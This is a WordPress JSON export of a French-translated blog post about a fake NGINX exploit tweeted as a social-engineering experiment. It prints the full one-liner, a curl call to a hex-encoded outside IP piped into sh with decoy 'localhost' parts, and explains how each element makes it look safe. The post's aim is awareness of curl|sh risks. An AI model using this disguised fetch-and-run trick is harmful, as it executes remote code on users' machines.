{"id":35126,"date":"2019-10-31T22:02:28","date_gmt":"2019-10-31T19:02:28","guid":{"rendered":"https:\/\/prohoster.info\/blog\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\/"},"modified":"2019-10-31T22:02:28","modified_gmt":"2019-10-31T19:02:28","slug":"uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","status":"publish","type":"post","link":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","title":{"rendered":"Le succ\u00e8s de l'exp\u00e9rience sociale avec l'exploit factice pour nginx","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><i><b>Note de traduction.<\/b>: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\">Auteur<\/a><\/noindex> L'article original, publi\u00e9 le 1er juin, a d\u00e9cid\u00e9 de mener une exp\u00e9rience aupr\u00e8s de ceux qui s'int\u00e9ressent \u00e0 la s\u00e9curit\u00e9 de l'information. Pour ce faire, il a pr\u00e9par\u00e9 un exploit factice pour une vuln\u00e9rabilit\u00e9 non r\u00e9v\u00e9l\u00e9e dans le serveur web et l'a publi\u00e9 sur son Twitter. Ses hypoth\u00e8ses \u2014 \u00eatre imm\u00e9diatement d\u00e9masqu\u00e9 par des sp\u00e9cialistes qui verraient l'\u00e9vident mensonge dans le code \u2014 ne se sont pas simplement r\u00e9v\u00e9l\u00e9es fausses\u2026 Elles ont d\u00e9pass\u00e9 toutes les attentes, dans le sens inverse : le tweet a re\u00e7u un \u00e9norme soutien de nombreux individus qui n'ont pas pris la peine de v\u00e9rifier son contenu.<\/i><\/p>\n<p><img decoding=\"async\" alt=\"Le succ\u00e8s de l&#039;exp\u00e9rience sociale avec l&#039;exploit factice pour nginx\" src=\"\/wp-content\/uploads\/2019\/06\/20ff08c6f541176c68ef2c689b989389.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n<b>TL;DR : n'utilisez en aucun cas le piping de fichiers en sh ou bash. C'est un excellent moyen de perdre le contr\u00f4le de votre ordinateur.<\/b><noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<p>Je veux partager avec vous une petite histoire sur un PoC d'exploit humoristique qui a \u00e9t\u00e9 cr\u00e9\u00e9 le 31 mai. Il est apparu rapidement en r\u00e9ponse \u00e0 la nouvelle de <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">Alisa Esage Shevchenko<\/a><\/noindex>, membre de <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thezdi\">Zero Day Initiative<\/a><\/noindex> (ZDI), annon\u00e7ant qu'une information sur une vuln\u00e9rabilit\u00e9 dans NGINX, menant \u00e0 une RCE (ex\u00e9cution de code \u00e0 distance), serait bient\u00f4t r\u00e9v\u00e9l\u00e9e. \u00c9tant donn\u00e9 que NGINX est \u00e0 la base de nombreux sites web, la nouvelle devait avoir un effet explosif. Cependant, en raison de retards dans le processus de \u00ab divulgation responsable \u00bb, les d\u00e9tails de ce qui s'est pass\u00e9 n'\u00e9taient pas connus \u2014 c'est la proc\u00e9dure standard du ZDI.<\/p>\n<p><img decoding=\"async\" alt=\"Le succ\u00e8s de l&#039;exp\u00e9rience sociale avec l&#039;exploit factice pour nginx\" src=\"\/wp-content\/uploads\/2019\/06\/fba47177ff2a2d05db7942f229e145b0.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\/status\/1134400951043874816\">Tweet<\/a><\/noindex> concernant la divulgation de la vuln\u00e9rabilit\u00e9 dans NGINX<\/i><\/p>\n<p>Ayant termin\u00e9 de travailler sur une nouvelle technique d'obfuscation dans curl, j'ai cit\u00e9 le tweet original et \u00ab l\u00e2ch\u00e9 un PoC fonctionnel \u00bb, compos\u00e9 d'une seule ligne de code, pr\u00e9tendument utilisant la vuln\u00e9rabilit\u00e9 d\u00e9couverte. Bien s\u00fbr, c'\u00e9tait une pur mensonge. Je pensais que j'allais \u00eatre d\u00e9masqu\u00e9 tout de suite, et que dans le meilleur des cas, je recevrais quelques retweets (et tant pis).<\/p>\n<p><img decoding=\"async\" alt=\"Le succ\u00e8s de l&#039;exp\u00e9rience sociale avec l&#039;exploit factice pour nginx\" src=\"\/wp-content\/uploads\/2019\/06\/30c8394a4bd7a151828bc3459f18f2f6.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\/status\/1134559331989434368\">Tweet<\/a><\/noindex> avec un exploit factice<\/i><\/p>\n<p>Cependant, je ne pouvais pas imaginer ce qui allait se passer ensuite. La popularit\u00e9 de mon tweet a grimp\u00e9 en fl\u00e8che. \u00c9tonnamment, jusqu'\u00e0 pr\u00e9sent (15h00 MSK le 1er juin), tr\u00e8s peu de gens ont r\u00e9alis\u00e9 que c'\u00e9tait une supercherie. Beaucoup le retweetent sans m\u00eame v\u00e9rifier (sans parler d\u2019admirer l'adorable ASCII art qu'il produit).<\/p>\n<p><img decoding=\"async\" alt=\"Le succ\u00e8s de l&#039;exp\u00e9rience sociale avec l&#039;exploit factice pour nginx\" src=\"\/wp-content\/uploads\/2019\/06\/a22501843edc07cf0dc49b698b1048c2.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Regardez comme c'est beau !<\/i><\/p>\n<p>Bien que tous ces cycles et couleurs soient remarquables, il est \u00e9vident que pour les voir, les gens devaient ex\u00e9cuter le code sur leur machine. Heureusement, les navigateurs fonctionnent de la m\u00eame mani\u00e8re, et \u00e9tant donn\u00e9 que je n'ai pas du tout besoin de probl\u00e8mes l\u00e9gaux, le code int\u00e9gr\u00e9 dans mon site se contentait d'appels echo, sans essayer d'installer ou d'ex\u00e9cuter de code suppl\u00e9mentaire.<\/p>\n<p>Petite digression : <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/netspooky\">netspooky<\/a><\/noindex>, <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/dnoiz1\">dnz<\/a><\/noindex>, moi et d'autres membres de l'\u00e9quipe <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thugcrowd\">Thugcrowd<\/a><\/noindex> experimentons depuis un certain temps diff\u00e9rentes mani\u00e8res d'obfusquer des commandes curl, parce que c'est amusant\u2026 et nous sommes des geeks. netspooky et dnz ont d\u00e9couvert plusieurs nouvelles m\u00e9thodes qui me semblaient extr\u00eamement prometteuses. Je me suis joint au plaisir et j'ai essay\u00e9 d'ajouter des conversions d'IP d\u00e9cimales \u00e0 notre ensemble de tours. Il s'est av\u00e9r\u00e9 qu'il est \u00e9galement possible de convertir l'IP en format hexad\u00e9cimal. De plus, curl et la plupart des autres outils NIX acceptent volontiers les IP hexad\u00e9cimales ! Il suffisait donc de cr\u00e9er une ligne de commande convaincante et \u00e0 l'apparence s\u00e9curis\u00e9e. Au final, je me suis arr\u00eat\u00e9 sur celle-ci :<\/p>\n<pre><code class=\"plaintext\">curl -gsS https:\/\/127.0.0.1-OR-VICTIM-SERVER:443\/..\/..\/..\/..\/\/nginx-handler?\/usr\/lib\/nginx\/modules\/ngx_stream_module.so:127.0.0.1:80:\/bin\/sh&lt;&#039;protocol:TCP&#039; -O 0x0238f06a#PLToffset |sh; nc \/dev\/tcp\/localhost<\/code><\/pre>\n<p><\/p>\n<h2>L'ing\u00e9nierie socio-\u00e9lectronique (S.E.E.) \u2014 plus qu'un simple phishing<\/h2>\n<p>\nLa s\u00e9curit\u00e9 et la familiarit\u00e9 ont \u00e9t\u00e9 au c\u0153ur de cette exp\u00e9rience. Je pense que c'est ce qui a conduit \u00e0 son succ\u00e8s. La ligne de commande impliquait clairement la s\u00e9curit\u00e9 en se r\u00e9f\u00e9rant \u00e0 \u00ab 127.0.0.1 \u00bb (le localhost bien connu). Le localhost est consid\u00e9r\u00e9 comme s\u00fbr, et les donn\u00e9es qu'il contient ne quittent jamais votre ordinateur.<\/p>\n<p>La familiarit\u00e9 \u00e9tait le deuxi\u00e8me \u00e9l\u00e9ment cl\u00e9 de l'exp\u00e9rience S.E.E. \u00c9tant donn\u00e9 que le public cible \u00e9tait principalement compos\u00e9 de personnes ayant des connaissances de base en s\u00e9curit\u00e9 informatique, il \u00e9tait important de cr\u00e9er un code dont les parties semblaient famili\u00e8res et donc s\u00fbres. L'emprunt d'\u00e9l\u00e9ments de concepts d'anciennes exploitations et leur combinaison de mani\u00e8re originale s'est av\u00e9r\u00e9 tr\u00e8s efficace.<\/p>\n<p>Voici une analyse d\u00e9taill\u00e9e de la ligne de code. <i>Tout dans cette liste est <b>d'ordre cosm\u00e9tique<\/b>, et il ne n\u00e9cessite pratiquement rien pour fonctionner r\u00e9ellement.<\/i><\/p>\n<p>Quels composants sont r\u00e9ellement n\u00e9cessaires ? Ce sont <code>-gsS<\/code>, <code>-O 0x0238f06a<\/code>, <code>|sh<\/code> et le serveur web lui-m\u00eame. Le serveur web ne contenait aucune instruction malveillante, il se contentait de transmettre des graphiques ASCII \u00e0 l'aide de commandes <code>echo<\/code> dans le script contenu dans <code>index.html<\/code>. Lorsque l'utilisateur saisissait une cha\u00eene avec <code>|sh<\/code> au milieu, <code>index.html<\/code> cela se chargeait et s'ex\u00e9cutait. Heureusement, les gardiens du serveur web n'avaient pas de mauvaises intentions.<\/p>\n<ul>\n<li> <code>..\/..\/..\/%00<\/code> \u2013 repr\u00e9sente un d\u00e9passement de r\u00e9pertoire ;<\/li>\n<li> <code>ngx_stream_module.so<\/code> \u2013 le chemin vers un module al\u00e9atoire de NGINX ;<\/li>\n<li> <code>\/bin\/sh%00&lt;'protocol:TCP'<\/code> \u2013 nous pr\u00e9tendons ex\u00e9cuter <code>\/bin\/sh<\/code> sur la machine cible et rediriger la sortie vers un canal TCP ;<\/li>\n<li> <code>-O 0x0238f06a#PLToffset<\/code> \u2013 un ingr\u00e9dient secret, compl\u00e9t\u00e9 <code>#PLToffset<\/code>, pour sembler \u00eatre un d\u00e9calage m\u00e9moire, contenu d'une mani\u00e8re ou d'une autre dans le PLT ;<\/li>\n<li> <code>|sh;<\/code> \u2013 un autre fragment important. Nous devions rediriger la sortie vers sh\/bash pour ex\u00e9cuter le code provenant du serveur web attaquant situ\u00e9 \u00e0 l'adresse <code>0x0238f06a<\/code> (<code>2.56.240.x<\/code>);<\/li>\n<li> <code>nc \/dev\/tcp\/localhost<\/code> \u2013 un leurre, o\u00f9 netcat fait r\u00e9f\u00e9rence \u00e0 <code>\/dev\/tcp\/localhost<\/code>, afin que tout semble \u00e0 nouveau s\u00e9curis\u00e9. En r\u00e9alit\u00e9, cela ne fait rien et est inclus dans la cha\u00eene pour l'apparence.<\/li>\n<\/ul>\n<p>\nC'est ici que se terminent la d\u00e9chiffration du script d'une ligne et la discussion des aspects de l'\u00ab ing\u00e9nierie socio-\u00e9lectronique \u00bb (phishing astucieux).<\/p>\n<h2>Configuration du serveur web et mesures d'att\u00e9nuation<\/h2>\n<p>\nPuisque la grande majorit\u00e9 de mes abonn\u00e9s sont des experts en cybers\u00e9curit\u00e9\/hackers, j'ai d\u00e9cid\u00e9 de rendre le serveur web un peu plus r\u00e9sistant aux manifestations d'\u00ab int\u00e9r\u00eat \u00bb de leur part simplement pour leur donner quelque chose \u00e0 faire (et le configurer \u00e9tait plut\u00f4t amusant). Je ne vais pas \u00e9num\u00e9rer ici tous les pi\u00e8ges, car l'exp\u00e9rience est encore en cours, mais voici quelques \u00e9l\u00e9ments que le serveur fait :<\/p>\n<ul>\n<li> Suit activement les tentatives de propagation sur certains r\u00e9seaux sociaux et injecte diff\u00e9rentes vignettes de pr\u00e9visualisation pour inciter l'utilisateur \u00e0 cliquer sur le lien.<\/li>\n<li> Redirige Chrome\/Mozilla\/Safari\/etc. vers une bande-annonce Thugcrowd au lieu de montrer le script shell.<\/li>\n<li> Surveille les SIGNAUX MANIFESTES d'intrusion\/violations, apr\u00e8s quoi il commence \u00e0 rediriger les requ\u00eates vers les serveurs de la NSA (ha ha !).<\/li>\n<li> Installe un cheval de Troie, ainsi qu'un rootkit BIOS sur tous les ordinateurs dont les utilisateurs visitent l'h\u00f4te avec un navigateur ordinaire (c'est une blague !).<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Le succ\u00e8s de l&#039;exp\u00e9rience sociale avec l&#039;exploit factice pour nginx\" src=\"\/wp-content\/uploads\/2019\/06\/8ea3f0c6e2e303bef6f9ba73370d6cf1.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Une petite partie de l'anti-m\u00e9chant<\/i><\/p>\n<p>Dans ce cas, mon seul objectif \u00e9tait de ma\u00eetriser certaines fonctionnalit\u00e9s d'Apache \u2013 en particulier, de super r\u00e8gles de redirection de requ\u00eates \u2013 et je me suis dit : pourquoi pas ?<\/p>\n<h2>Exploit NGINX (vrai !)<\/h2>\n<p>\nSuivez <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">@alisaesage<\/a><\/noindex> sur Twitter et suivez le travail remarquable de ZDI pour corriger des vuln\u00e9rabilit\u00e9s r\u00e9elles et des opportunit\u00e9s d'exploitation dans NGINX. Leur travail m'a toujours fascin\u00e9 et je remercie Alice pour sa patience concernant toutes les mentions et notifications caus\u00e9es par mon tweet idiot. Heureusement, cela a \u00e9galement eu quelques avantages : cela a permis de sensibiliser aux vuln\u00e9rabilit\u00e9s de NGINX ainsi qu'aux probl\u00e8mes caus\u00e9s par l'abus de curl.<br \/>\n<br \/>Source : <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/flant\/blog\/454700\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":26410,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-35126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"fr_FR\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Succ\u00e8s de l'exp\u00e9rience sociale avec un faux exploit pour nginx | ProHoster","description":"Ex.","canonical_url":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"fr_FR","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster","og:description":"\u041f\u0440\u0438\u043c.","og:url":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:02:28+00:00","article:modified_time":"2019-10-31T19:02:28+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"35126","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-21 21:57:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 22:59:48","updated":"2026-01-21 21:57:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/35126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/comments?post=35126"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/35126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/media\/26410"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/media?parent=35126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/categories?post=35126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/tags?post=35126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}